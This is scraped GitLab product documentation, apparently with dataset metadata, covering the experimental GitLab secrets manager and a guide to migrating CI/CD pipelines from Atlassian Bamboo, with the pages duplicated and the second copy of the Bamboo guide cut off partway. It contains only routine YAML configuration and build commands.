To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
GitLab secrets manager
null
{{< details >}} - Tier: Ultimate - Status: Experiment {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/16319) in GitLab 18.3 [with the flags](../../../development/feature_flags/_index.md) `secrets_manager` and `ci_tanukey_ui`. Disabled by default. {{< /history >}} {{< alert type="warning" >}} This feature is an [experiment](../../../policy/development_stages_support.md#experiment) and subject to change without notice. This feature is not ready for production use. {{< /alert >}} Secrets represent sensitive information your CI/CD jobs need to function. Secrets could be access tokens, database credentials, private keys, or similar. Unlike CI/CD variables, which are always available to jobs by default, secrets must be explicitly requested by a job. Use the GitLab secrets manager to securely store and manage your project's secrets and credentials. ## Enable the secrets manager Prerequisites: - You must have the Owner role for the project. To enable the secrets manager: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > General**. 1. Expand **Visibility, project features, permissions**. 1. Turn on the **Secrets Manager** toggle and wait for the secrets manager to be provisioned. ## Define a secret You can add secrets to the secrets manager so that it can be used for secure CI/CD pipelines and workflows. 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Secure > Secrets manager**. 1. Select **Add secret** and fill in the details: - **Name**: Must be unique in the project. - **Value**: No limitations. - **Description**: Maximum of 200 characters. - **Environments**: Can be: - **All (default)** (`*`) - A specific [environment](../../environments/_index.md#types-of-environments) - A [wildcard environment](../../environments/_index.md#limit-the-environment-scope-of-a-cicd-variable). - **Branch**: Any branch from the project. - **Expiration date**: Secrets become unavailable after the expiration date. After you create a secret, you can use it in the pipeline configuration or in job scripts. ## Use secrets in job scripts To access secrets defined with the secret manager, use the [`secrets`](../../yaml/_index.md#secrets) and `gitlab_secrets_manager` keywords: ```yaml job: secrets: TEST_SECRET: gitlab_secrets_manager: name: foo script: - cat $TEST_SECRET ```
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: GitLab secrets manager ignore_in_report: true breadcrumbs: - doc - ci - secrets - secrets_manager --- {{< details >}} - Tier: Ultimate - Status: Experiment {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/16319) in GitLab 18.3 [with the flags](../../../development/feature_flags/_index.md) `secrets_manager` and `ci_tanukey_ui`. Disabled by default. {{< /history >}} {{< alert type="warning" >}} This feature is an [experiment](../../../policy/development_stages_support.md#experiment) and subject to change without notice. This feature is not ready for production use. {{< /alert >}} Secrets represent sensitive information your CI/CD jobs need to function. Secrets could be access tokens, database credentials, private keys, or similar. Unlike CI/CD variables, which are always available to jobs by default, secrets must be explicitly requested by a job. Use the GitLab secrets manager to securely store and manage your project's secrets and credentials. ## Enable the secrets manager Prerequisites: - You must have the Owner role for the project. To enable the secrets manager: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > General**. 1. Expand **Visibility, project features, permissions**. 1. Turn on the **Secrets Manager** toggle and wait for the secrets manager to be provisioned. ## Define a secret You can add secrets to the secrets manager so that it can be used for secure CI/CD pipelines and workflows. 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Secure > Secrets manager**. 1. Select **Add secret** and fill in the details: - **Name**: Must be unique in the project. - **Value**: No limitations. - **Description**: Maximum of 200 characters. - **Environments**: Can be: - **All (default)** (`*`) - A specific [environment](../../environments/_index.md#types-of-environments) - A [wildcard environment](../../environments/_index.md#limit-the-environment-scope-of-a-cicd-variable). - **Branch**: Any branch from the project. - **Expiration date**: Secrets become unavailable after the expiration date. After you create a secret, you can use it in the pipeline configuration or in job scripts. ## Use secrets in job scripts To access secrets defined with the secret manager, use the [`secrets`](../../yaml/_index.md#secrets) and `gitlab_secrets_manager` keywords: ```yaml job: secrets: TEST_SECRET: gitlab_secrets_manager: name: foo script: - cat $TEST_SECRET ```
https://docs.gitlab.com/ci/bamboo
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/bamboo.md
2025-08-13
doc/ci/migration
[ "doc", "ci", "migration" ]
bamboo.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Migrating from Bamboo
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} This migration guide looks at how you can migrate from Atlassian Bamboo to GitLab CI/CD. The focus is on [Bamboo Specs YAML](https://docs.atlassian.com/bamboo-specs-docs/8.1.12/specs.html?yaml) exported from the Bamboo UI or stored in Spec repositories. ## GitLab CI/CD Primer If you are new to GitLab CI/CD, use the [Getting started guide](../_index.md) to learn the basic concepts and how to create your first [`.gitlab-ci.yml` file](../quick_start/_index.md). If you already have some experience using GitLab CI/CD, you can review [CI/CD YAML syntax reference](../yaml/_index.md) to see the full list of available keywords. You can also take a look at [Auto DevOps](../../topics/autodevops/_index.md), which automatically builds, tests, and deploys your application using a collection of pre-configured features and integrations. ## Key similarities and differences ### Offerings Atlassian offers Bamboo in its Cloud (SaaS) or Data center (self-hosted) options. A third Server option is scheduled for [EOL on February 15, 2024](https://about.gitlab.com/blog/2023/09/26/atlassian-server-ending-move-to-a-single-devsecops-platform/). These options are similar to [GitLab.com](../../subscriptions/gitlab_com/_index.md) and [GitLab Self-Managed](../../subscriptions/self_managed/_index.md). GitLab also offers [GitLab Dedicated](../../subscriptions/gitlab_dedicated/_index.md), a fully isolated single-tenant SaaS service. ### Agents vs Runners Bamboo uses [agents](https://confluence.atlassian.com/bamboo/configuring-agents-289277172.html) to run builds and deployments. Agents can be local agents running on the Bamboo server or remote agents running external to the server. GitLab uses a similar concept to agents called [runners](https://docs.gitlab.com/runner/) which use [executors](https://docs.gitlab.com/runner/executors/) to run builds. Examples of executors are shell, Docker, or Kubernetes. You can choose to use [GitLab.com runners](../runners/_index.md) or deploy your own [self-managed runners](https://docs.gitlab.com/runner/install/). ### Workflow [Bamboo workflow](https://confluence.atlassian.com/bamboo/understanding-the-bamboo-ci-server-289277285.html) is organized into projects. Projects are used to organize Plans, along with variables, shared credentials, and permissions needed by multiple plans. A plan groups jobs into stages and links to code repositories where applications to be built are hosted. Repositories could be in Bitbucket, GitLab, or other services. A job is a series of tasks that are executed sequentially on the same Bamboo agent. CI and deployments are treated separately in Bamboo. [Deployment project workflow](https://confluence.atlassian.com/bamboo/deployment-projects-workflow-362971857.html) is different from the build plans workflow. [Learn more](https://confluence.atlassian.com/bamboo/understanding-the-bamboo-ci-server-289277285.html) about Bamboo workflow. GitLab CI/CD uses a similar workflow. Jobs are organized into [stages](../yaml/_index.md#stage), and projects have individual `.gitlab-ci.yml` configuration files or include existing templates. ### Templating & Configuration as Code #### Bamboo Specs Bamboo plans can be configured in either the Web UI or with Bamboo Specs. [Bamboo Specs](https://confluence.atlassian.com/bamboo/bamboo-specs-894743906.html) is configuration as code, which can be written in Java or YAML. [YAML Specs](https://docs.atlassian.com/bamboo-specs-docs/8.1.12/specs.html?yaml) is the easiest to use but lacks in Bamboo feature coverage. [Java Specs](https://docs.atlassian.com/bamboo-specs-docs/8.1.12/specs.html?java) has complete Bamboo feature coverage and can be written in any JVM language like Groovy, Scala, or Kotlin. If you configured your plans using the Web UI, you can [export your Bamboo configuration](https://confluence.atlassian.com/bamboo/exporting-existing-plan-configuration-to-bamboo-yaml-specs-1018270696.html) into Bamboo Specs. Bamboo Specs can also be [repository-stored](https://confluence.atlassian.com/bamboo/enabling-repository-stored-bamboo-specs-938641941.html). #### `.gitlab-ci.yml` configuration file GitLab, by default, uses a `.gitlab-ci.yml` file for CI/CD configuration. Alternatively, [Auto DevOps](../../topics/autodevops/_index.md) can automatically build, test, and deploy your application without a manually configured `.gitlab-ci.yml` file. GitLab CI/CD configuration can be organized into templates that are reusable across projects. GitLab also provides pre-built [templates](../examples/_index.md#cicd-templates) that help you get started quickly and avoid re-inventing the wheel. ### Configuration #### Bamboo YAML Spec syntax This Bamboo Spec was exported from a Bamboo Server instance, which creates quite verbose output: ```yaml version: 2 plan: project-key: AB key: TP name: test plan stages: - Default Stage: manual: false final: false jobs: - Default Job Default Job: key: JOB1 tasks: - checkout: force-clean-build: false description: Checkout Default Repository - script: interpreter: SHELL scripts: - |- ruby -v # Print out ruby version for debugging bundle config set --local deployment true # Install dependencies into ./vendor/ruby bundle install -j $(nproc) rubocop rspec spec description: run bundler artifact-subscriptions: [] repositories: - Demo Project: scope: global triggers: - polling: period: '180' branches: create: manually delete: never link-to-jira: true notifications: [] labels: [] dependencies: require-all-stages-passing: false enabled-for-branches: true block-strategy: none plans: [] other: concurrent-build-plugin: system-default --- version: 2 plan: key: AB-TP plan-permissions: - users: - root permissions: - view - edit - build - clone - admin - view-configuration - roles: - logged-in - anonymous permissions: - view ... ``` A GitLab CI/CD `.gitlab-ci.yml` configuration with similar behavior would be: ```yaml default: image: ruby:latest stages: - default-stage job1: stage: default-stage script: - ruby -v # Print out ruby version for debugging - bundle config set --local deployment true # Install dependencies into ./vendor/ruby - bundle install -j $(nproc) - rubocop - rspec spec ``` ### Common Configurations This section reviews some common Bamboo configurations and the GitLab CI/CD equivalents. #### Workflow Bamboo is structured differently compared to GitLab CI/CD. With GitLab, CI/CD can be enabled in a project in a number of ways: by adding a `.gitlab-ci.yml` file to the project, the existence of a Compliance pipeline in the group the project belongs to, or enabling AutoDevOps. Pipelines are then triggered automatically, depending on rules or context, where AutoDevOps is used. Bamboo is structured differently, [repositories need to be added](https://confluence.atlassian.com/bamboo0903/linking-to-source-code-repositories-1236445195.html) to a Bamboo project, with authentication provided and [triggers](https://confluence.atlassian.com/bamboo0903/triggering-builds-1236445226.html) are set. Repositories added to projects are available to all plans in the project. Plans used for testing and building applications are called Build plans. #### Build Plans Build Plans in Bamboo are composed of Stages that run sequentially to build an application and generate artifacts where relevant. Build Plans require a default repository attached to it or inherit linked repositories from its parent project. Variables, triggers, and relationships between different plans can be defined at the plan level. An example of a Bamboo build plan: ```yaml version: 2 plan: project-key: SAMPLE name: Build Ruby App key: BUILD-APP stages: - Test App: jobs: - Test Application - Perform Security checks - Build App: jobs: - Build Application Test Application: tasks: - script: - # Run tests Perform Security checks: tasks: - script: - # Run Security Checks Build Application: tasks: - script: - # Run buils ``` In this example: - Plan Specs include a YAML Spec version. Version 2 is the latest. - The `project-key` links the plan to its parent project. The key is specified when creating the project. - Plan `key` uniquely identifies the plan. In GitLab CI/CD, a Bamboo Build plan is similar to the `.gitlab-ci.yml` file in a project, which can include CI/CD scripts from other projects or templates. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml default: image: alpine:latest stages: - test - build test-application: stage: test script: - # Run tests security-checks: stage: test script: - # Run Security Checks build-application: stage: build script: - # Run builds ``` #### Container Images Builds and deployments are run by default on the Bamboo agent's native operating system, but can be configured to run in containers. To make jobs run in a container, Bamboo uses the `docker` keyword at the plan or job level. For example, in a Bamboo build plan: ```yaml version: 2 plan: project-key: SAMPLE name: Build Ruby App key: BUILD-APP docker: alpine:latest stages: - Build App: jobs: - Build Application Build Application: tasks: - script: - # Run builds docker: image: alpine:edge ``` In GitLab CI/CD, you only need the `image` keyword. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml default: image: alpine:latest stages: - build build-application: stage: build script: - # Run builds image: name: alpine:edge ``` #### Variables Bamboo has the following types of [variables](https://confluence.atlassian.com/bamboo/bamboo-variables-289277087.html) based on scope: - Build-specific variables which are evaluated at build time. For example `${bamboo.planKey}`. - System variables inherited from the Bamboo instance or system environment. - Global variables defined for the entire instance and accessible to every plan. - Project variables specific to a project and accessible by plans in the same project. - Plan variables specific to a plan. You can access variables in Bamboo using the format `${system.variableName}` for System variables and `${bamboo.variableName}` for other types of variables. When using a variable in a script task, the full stops, are converted to underscores, `${bamboo.variableName}` becomes `$bamboo_variableName`. In GitLab, you can define [CI/CD variables](../variables/_index.md) at these levels: - Instance - Group - Project - In the `.gitlab-ci.yml` file as default variables for all jobs - In the `.gitlab-ci.yml` file in individual jobs Like Bamboo's System and Global variables, GitLab has [predefined CI/CD variables](../variables/predefined_variables.md) that are available to every job. Defining variables in CI/CD scripts is similar in both Bamboo and GitLab. For example, in a Bamboo build plan: ```yaml version: 2 # ... variables: username: admin releaseType: milestone Default job: tasks: - script: echo '$bamboo_username is the DRI for $bamboo_releaseType' ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml variables: DEFAULT_VAR: "A default variable" job1: variables: JOB_VAR: "A job variable" script: - echo "Variables are '$DEFAULT_VAR' and '$JOB_VAR'" ``` In GitLab CI/CD, variables are accessed like regular Shell script variables. For example, `$VARIABLE_NAME`. #### Jobs & Tasks In both GitLab and Bamboo, jobs in the same stage run in parallel, except where there is a dependency that needs to be met before a job runs. The number of jobs that can run in Bamboo depends on availability of Bamboo agents and Bamboo license Size. With [GitLab CI/CD](../jobs/_index.md), the number of parallel jobs depends on the number of runners integrated with the GitLab instance and the concurrency set in the runners. In Bamboo, Jobs are composed of [Tasks](https://confluence.atlassian.com/bamboo/configuring-tasks-289277036.html), which can be: - A set of commands run as a [script](https://confluence.atlassian.com/bamboo/script-289277046.html) - Predefined tasks like source code checkout, artifact download, and other tasks available in the Atlassian [tasks marketplace](https://marketplace.atlassian.com/addons/app/bamboo). For example, in a Bamboo build plan: ```yaml version: 2 #... Default Job: key: JOB1 tasks: - checkout: force-clean-build: false description: Checkout Default Repository - script: interpreter: SHELL scripts: - |- ruby -v bundle config set --local deployment true bundle install -j $(nproc) description: run bundler other: concurrent-build-plugin: system-default ``` The equivalent of Tasks in GitLab is the `script`, which specifies the commands for the runner to execute. For example, in a GitLab CI/CD `.gitlab-ci.yml` file: ```yaml job1: script: "bundle exec rspec" job2: script: - ruby -v - bundle config set --local deployment true - bundle install -j $(nproc) ``` With GitLab, you can use [CI/CD templates](https://gitlab.com/gitlab-org/gitlab-foss/tree/master/lib/gitlab/ci/templates) and [CI/CD components](../components/_index.md) to compose your pipelines without the need to write everything yourself. #### Conditionals In Bamboo, every task can have conditions that determine if a task runs. For example, in a Bamboo build plan: ```yaml version: 2 # ... tasks: - script: interpreter: SHELL scripts: - echo "Hello" conditions: - variable: equals: planRepository.branch: development ``` With GitLab, this can be done with the `rules` keyword to [control when jobs run](../jobs/job_control.md) in GitLab CI/CD. For example, in a GitLab CI/CD `.gitlab-ci.yml` file: ```yaml job: script: echo "Hello, Rules!" rules: - if: $CI_MERGE_REQUEST_SOURCE_BRANCH_NAME = development ``` #### Triggers Bamboo has a number of options for [triggering builds](https://confluence.atlassian.com/bamboo/triggering-builds-289276897.html), which can be based on code changes, a schedule, the outcomes of other plans, or on demand. A plan can be configured to periodically poll a project for new changes. For example, in a Bamboo build plan: ```yaml version: 2 #... triggers: - polling: period: '180' ``` GitLab CI/CD pipelines can be triggered based on code change, on schedule, or triggered by other jobs or API calls. GitLab CI/CD pipelines do not need to use polling, but can be triggered on schedule as well. You can configure when pipelines themselves run with the [`workflow` keyword](../yaml/workflow.md), and `rules`. For example, in a GitLab CI/CD `.gitlab-ci.yml` file: ```yaml workflow: rules: - changes: - .gitlab/**/**.md when: never ``` #### Artifacts You can define Job artifacts using the `artifacts` keyword in both GitLab and Bamboo. For example, in a Bamboo build plan: ```yaml version: 2 # ... Build: # ... artifacts: - name: Test Reports location: target/reports pattern: '*.xml' required: false shared: false - name: Special Reports location: target/reports pattern: 'special/*.xml' shared: true ``` In this example, artifacts are defined with a name, location, and pattern. You can also share the artifacts with other jobs and plans or define jobs that subscribe to the artifact. `artifact-subscriptions` is used to access artifacts from another job in the same plan, for example: ```yaml Test app: artifact-subscriptions: - artifact: Test Reports destination: deploy ``` `artifact-download` is used to access artifacts from jobs in a different plan, for example: ```yaml version: 2 # ... Build: # ... tasks: - artifact-download: source-plan: PROJECTKEY-PLANKEY ``` You need to provide the key of the plan you are downloading artifacts from in the `source-plan` keyword. In GitLab, all [artifacts](../jobs/job_artifacts.md) from completed jobs in earlier stages are downloaded by default. For example, in a GitLab CI/CD `.gitlab-ci.yml` file: ```yaml stages: - build pdf: stage: build script: #generate XML reports artifacts: name: "test-report-files" untracked: true paths: - target/reports ``` In this example: - The name of the artifact is specific explicitly, but you can make it dynamic by using a CI/CD variable. - The `untracked` keyword sets the artifact to also include Git untracked files, along with those specified explicitly with `paths`. #### Caching In Bamboo, [Git caches](https://confluence.atlassian.com/bamkb/how-stored-git-caches-speed-up-builds-690848923.html) can be used to speed up builds. Git caches are configured in Bamboo administration settings and are stored either on the Bamboo server or remote agents. GitLab supports both Git Caches and Job cache. [Caches](../caching/_index.md) are defined per job using the `cache` keyword. For example, in a GitLab CI/CD `.gitlab-ci.yml` file: ```yaml test-job: stage: build cache: - key: files: - Gemfile.lock paths: - vendor/ruby - key: files: - yarn.lock paths: - .yarn-cache/ script: - bundle config set --local path 'vendor/ruby' - bundle install - yarn install --cache-folder .yarn-cache - echo Run tests... ``` #### Deployment Projects Bamboo has [Deployments project](https://confluence.atlassian.com/bamboo/deployment-projects-338363438.html), which link to Build plans to track, fetch, and deploy artifacts to [deployment environments](https://confluence.atlassian.com/bamboo0903/creating-a-deployment-environment-1236445634.html). When creating a project you link it to a build plan, specify the deployment environment and the tasks to perform the deployments. A [deployment task](https://confluence.atlassian.com/bamboo0903/tasks-for-deployment-environments-1236445662.html) can either be a script or a Bamboo task from the Atlassian marketplace. For example in a Deployment project Spec: ```yaml version: 2 deployment: name: Deploy ruby app source-plan: build-app release-naming: release-1.0 environments: - Production Production: tasks: - # scripts to deploy app to production - ./.ci/deploy_prod.sh ``` In GitLab CI/CD, You can create a [deployment job](../jobs/_index.md#deployment-jobs) that deploys to an [environment](../environments/_index.md) or creates a [release](../../user/project/releases/_index.md). For example, in a GitLab CI/CD `.gitlab-ci.yml` file: ```yaml deploy-to-production: stage: deploy script: - # Run Deployment script - ./.ci/deploy_prod.sh environment: name: production ``` To create release instead, use the [`release`](../yaml/_index.md#release) keyword with the [release-cli](https://gitlab.com/gitlab-org/release-cli/-/tree/master/docs) tool to create releases for [Git tags](../../user/project/repository/tags/_index.md). For example, in a GitLab CI/CD `.gitlab-ci.yml` file: ```yaml release_job: stage: release image: registry.gitlab.com/gitlab-org/release-cli:latest rules: - if: $CI_COMMIT_TAG # Run this job when a tag is created manually script: - echo "Building release version" release: tag_name: $CI_COMMIT_TAG name: 'Release $CI_COMMIT_TAG' description: 'Release created using the release-cli.' ``` ### Security Scanning features Bamboo relies on third-party tasks provided in the Atlassian Marketplace to run security scans. GitLab provides [security scanners](../../user/application_security/_index.md) out-of-the-box to detect vulnerabilities in all parts of the SDLC. You can add these plugins in GitLab using templates, for example to add SAST scanning to your pipeline, add the following to your `.gitlab-ci.yml`: ```yaml include: - template: Jobs/SAST.gitlab-ci.yml ``` You can customize the behavior of security scanners by using CI/CD variables, for example with the [SAST scanners](../../user/application_security/sast/_index.md#available-cicd-variables). ### Secrets Management Privileged information, often referred to as "secrets", is sensitive information or credentials you need in your CI/CD workflow. You might use secrets to unlock protected resources or sensitive information in tools, applications, containers, and cloud-native environments. Secrets management in Bamboo is usually handled using [Shared credentials](https://confluence.atlassian.com/bamboo/shared-credentials-424313357.html), or via third-party applications from the Atlassian market place. For secrets management in GitLab, you can use one of the supported integrations for an external service. These services securely store secrets outside of your GitLab project, though you must have a subscription for the service: - [HashiCorp Vault](../secrets/hashicorp_vault.md) - [Azure Key Vault](../secrets/azure_key_vault.md) - [Google Cloud Secret Manager](../secrets/gcp_secret_manager.md) GitLab also supports [OIDC authentication](../secrets/id_token_authentication.md) for other third party services that support OIDC. Additionally, you can make credentials available to jobs by storing them in CI/CD variables, though secrets stored in plain text are susceptible to accidental exposure, [the same as in Bamboo](https://confluence.atlassian.com/bamboo/bamboo-specs-encryption-970268127.html). You should always store sensitive information in [masked](../variables/_index.md#mask-a-cicd-variable) and [protected](../variables/_index.md#protect-a-cicd-variable) variables, which mitigates some of the risk. Also, never store secrets as variables in your `.gitlab-ci.yml` file, which is public to all users with access to the project. Storing sensitive information in variables should only be done in [the project, group, or instance settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). Review the [security guidelines](../variables/_index.md#cicd-variable-security) to improve the safety of your CI/CD variables. ### Migration Plan The following list of recommended steps was created after observing organizations that were able to quickly complete this migration. #### Create a Migration Plan Before starting a migration you should create a [migration plan](plan_a_migration.md) to make preparations for the migration. For a migration from Bamboo, ask yourself the following questions in preparation: - What Bamboo Tasks are used by jobs in Bamboo today? - Do you know what these Tasks do exactly? - Do any Task wrap a common build tool? For example, Maven, Gradle, or NPM? - What is installed on the Bamboo agents? - Are there any shared libraries in use? - How are you authenticating from Bamboo? Are you using SSH keys, API tokens, or other secrets? - Are there other projects that you need to access from your pipeline? - Are there credentials in Bamboo to access outside services? For example Ansible Tower, Artifactory, or other Cloud Providers or deployment targets? #### Prerequisites Before doing any migration work, you should first: 1. Get familiar with GitLab. - Read about the [key GitLab CI/CD features](../_index.md). - Follow tutorials to create [your first GitLab pipeline](../quick_start/_index.md) and [more complex pipelines](../quick_start/tutorial.md) that build, test, and deploy a static site. - Review the [CI/CD YAML syntax reference](../yaml/_index.md). 1. Set up and configure GitLab. 1. Test your GitLab instance. - Ensure [runners](../runners/_index.md) are available, either by using shared GitLab.com runners or installing new runners. #### Migration Steps 1. Migrate projects from your SCM solution to GitLab. - (Recommended) You can use the available [importers](../../user/project/import/_index.md) to automate mass imports from external SCM providers. - You can [import repositories by URL](../../user/project/import/repo_by_url.md). 1. Create a `.gitlab-ci.yml` file in each project. 1. Export your Bamboo Projects/Plans as YAML Spec 1. Migrate Bamboo YAML Spec configuration to GitLab CI/CD jobs and configure them to show results directly in merge requests. 1. Migrate deployment jobs by using [cloud deployment templates](../cloud_deployment/_index.md), [environments](../environments/_index.md), and the [GitLab agent for Kubernetes](../../user/clusters/agent/_index.md). 1. Check if any CI/CD configuration can be reused across different projects, then create and share CI/CD templates. 1. Check the [pipeline efficiency documentation](../pipelines/pipeline_efficiency.md) to learn how to make your GitLab CI/CD pipelines faster and more efficient. If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource.
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Migrating from Bamboo breadcrumbs: - doc - ci - migration --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} This migration guide looks at how you can migrate from Atlassian Bamboo to GitLab CI/CD. The focus is on [Bamboo Specs YAML](https://docs.atlassian.com/bamboo-specs-docs/8.1.12/specs.html?yaml) exported from the Bamboo UI or stored in Spec repositories. ## GitLab CI/CD Primer If you are new to GitLab CI/CD, use the [Getting started guide](../_index.md) to learn the basic concepts and how to create your first [`.gitlab-ci.yml` file](../quick_start/_index.md). If you already have some experience using GitLab CI/CD, you can review [CI/CD YAML syntax reference](../yaml/_index.md) to see the full list of available keywords. You can also take a look at [Auto DevOps](../../topics/autodevops/_index.md), which automatically builds, tests, and deploys your application using a collection of pre-configured features and integrations. ## Key similarities and differences ### Offerings Atlassian offers Bamboo in its Cloud (SaaS) or Data center (self-hosted) options. A third Server option is scheduled for [EOL on February 15, 2024](https://about.gitlab.com/blog/2023/09/26/atlassian-server-ending-move-to-a-single-devsecops-platform/). These options are similar to [GitLab.com](../../subscriptions/gitlab_com/_index.md) and [GitLab Self-Managed](../../subscriptions/self_managed/_index.md). GitLab also offers [GitLab Dedicated](../../subscriptions/gitlab_dedicated/_index.md), a fully isolated single-tenant SaaS service. ### Agents vs Runners Bamboo uses [agents](https://confluence.atlassian.com/bamboo/configuring-agents-289277172.html) to run builds and deployments. Agents can be local agents running on the Bamboo server or remote agents running external to the server. GitLab uses a similar concept to agents called [runners](https://docs.gitlab.com/runner/) which use [executors](https://docs.gitlab.com/runner/executors/) to run builds. Examples of executors are shell, Docker, or Kubernetes. You can choose to use [GitLab.com runners](../runners/_index.md) or deploy your own [self-managed runners](https://docs.gitlab.com/runner/install/). ### Workflow [Bamboo workflow](https://confluence.atlassian.com/bamboo/understanding-the-bamboo-ci-server-289277285.html) is organized into projects. Projects are used to organize Plans, along with variables, shared credentials, and permissions needed by multiple plans. A plan groups jobs into stages and links to code repositories where applications to be built are hosted. Repositories could be in Bitbucket, GitLab, or other services. A job is a series of tasks that are executed sequentially on the same Bamboo agent. CI and deployments are treated separately in Bamboo. [Deployment project workflow](https://confluence.atlassian.com/bamboo/deployment-projects-workflow-362971857.html) is different from the build plans workflow. [Learn more](https://confluence.atlassian.com/bamboo/understanding-the-bamboo-ci-server-289277285.html) about Bamboo workflow. GitLab CI/CD uses a similar workflow. Jobs are organized into [stages](../yaml/_index.md#stage), and projects have individual `.gitlab-ci.yml` configuration files or include existing templates. ### Templating & Configuration as Code #### Bamboo Specs Bamboo plans can be configured in either the Web UI or with Bamboo Specs. [Bamboo Specs](https://confluence.atlassian.com/bamboo/bamboo-specs-894743906.html) is configuration as code, which can be written in Java or YAML. [YAML Specs](https://docs.atlassian.com/bamboo-specs-docs/8.1.12/specs.html?yaml) is the easiest to use but lacks in Bamboo feature coverage. [Java Specs](https://docs.atlassian.com/bamboo-specs-docs/8.1.12/specs.html?java) has complete Bamboo feature coverage and can be written in any JVM language like Groovy, Scala, or Kotlin. If you configured your plans using the Web UI, you can [export your Bamboo configuration](https://confluence.atlassian.com/bamboo/exporting-existing-plan-configuration-to-bamboo-yaml-specs-1018270696.html) into Bamboo Specs. Bamboo Specs can also be [repository-stored](https://confluence.atlassian.com/bamboo/enabling-repository-stored-bamboo-specs-938641941.html). #### `.gitlab-ci.yml` configuration file GitLab, by default, uses a `.gitlab-ci.yml` file for CI/CD configuration. Alternatively, [Auto DevOps](../../topics/autodevops/_index.md) can automatically build, test, and deploy your application without a manually configured `.gitlab-ci.yml` file. GitLab CI/CD configuration can be organized into templates that are reusable across projects. GitLab also provides pre-built [templates](../examples/_index.md#cicd-templates) that help you get started quickly and avoid re-inventing the wheel. ### Configuration #### Bamboo YAML Spec syntax This Bamboo Spec was exported from a Bamboo Server instance, which creates quite verbose output: ```yaml version: 2 plan: project-key: AB key: TP name: test plan stages: - Default Stage: manual: false final: false jobs: - Default Job Default Job: key: JOB1 tasks: - checkout: force-clean-build: false description: Checkout Default Repository - script: interpreter: SHELL scripts: - |- ruby -v # Print out ruby version for debugging bundle config set --local deployment true # Install dependencies into ./vendor/ruby bundle install -j $(nproc) rubocop rspec spec description: run bundler artifact-subscriptions: [] repositories: - Demo Project: scope: global triggers: - polling: period: '180' branches: create: manually delete: never link-to-jira: true notifications: [] labels: [] dependencies: require-all-stages-passing: false enabled-for-branches: true block-strategy: none plans: [] other: concurrent-build-plugin: system-default --- version: 2 plan: key: AB-TP plan-permissions: - users: - root permissions: - view - edit - build - clone - admin - view-configuration - roles: - logged-in - anonymous permissions: - view ... ``` A GitLab CI/CD `.gitlab-ci.yml` configuration with similar behavior would be: ```yaml default: image: ruby:latest stages: - default-stage job1: stage: default-stage script: - ruby -v # Print out ruby version for debugging - bundle config set --local deployment true # Install dependencies into ./vendor/ruby - bundle install -j $(nproc) - rubocop - rspec spec ``` ### Common Configurations This section reviews some common Bamboo configurations and the GitLab CI/CD equivalents. #### Workflow Bamboo is structured differently compared to GitLab CI/CD. With GitLab, CI/CD can be enabled in a project in a number of ways: by adding a `.gitlab-ci.yml` file to the project, the existence of a Compliance pipeline in the group the project belongs to, or enabling AutoDevOps. Pipelines are then triggered automatically, depending on rules or context, where AutoDevOps is used. Bamboo is structured differently, [repositories need to be added](https://confluence.atlassian.com/bamboo0903/linking-to-source-code-repositories-1236445195.html) to a Bamboo project, with authentication provided and [triggers](https://confluence.atlassian.com/bamboo0903/triggering-builds-1236445226.html) are set. Repositories added to projects are available to all plans in the project. Plans used for testing and building applications are called Build plans. #### Build Plans Build Plans in Bamboo are composed of Stages that run sequentially to build an application and generate artifacts where relevant. Build Plans require a default repository attached to it or inherit linked repositories from its parent project. Variables, triggers, and relationships between different plans can be defined at the plan level. An example of a Bamboo build plan: ```yaml version: 2 plan: project-key: SAMPLE name: Build Ruby App key: BUILD-APP stages: - Test App: jobs: - Test Application - Perform Security checks - Build App: jobs: - Build Application Test Application: tasks: - script: - # Run tests Perform Security checks: tasks: - script: - # Run Security Checks Build Application: tasks: - script: - # Run buils ``` In this example: - Plan Specs include a YAML Spec version. Version 2 is the latest. - The `project-key` links the plan to its parent project. The key is specified when creating the project. - Plan `key` uniquely identifies the plan. In GitLab CI/CD, a Bamboo Build plan is similar to the `.gitlab-ci.yml` file in a project, which can include CI/CD scripts from other projects or templates. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml default: image: alpine:latest stages: - test - build test-application: stage: test script: - # Run tests security-checks: stage: test script: - # Run Security Checks build-application: stage: build script: - # Run builds ``` #### Container Images Builds and deployments are run by default on the Bamboo agent's native operating system, but can be configured to run in containers. To make jobs run in a container, Bamboo uses the `docker` keyword at the plan or job level. For example, in a Bamboo build plan: ```yaml version: 2 plan: project-key: SAMPLE name: Build Ruby App key: BUILD-APP docker: alpine:latest stages: - Build App: jobs: - Build Application Build Application: tasks: - script: - # Run builds docker: image: alpine:edge ``` In GitLab CI/CD, you only need the `image` keyword. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml default: image: alpine:latest stages: - build build-application: stage: build script: - # Run builds image: name: alpine:edge ``` #### Variables Bamboo has the following types of [variables](https://confluence.atlassian.com/bamboo/bamboo-variables-289277087.html) based on scope: - Build-specific variables which are evaluated at build time. For example `${bamboo.planKey}`. - System variables 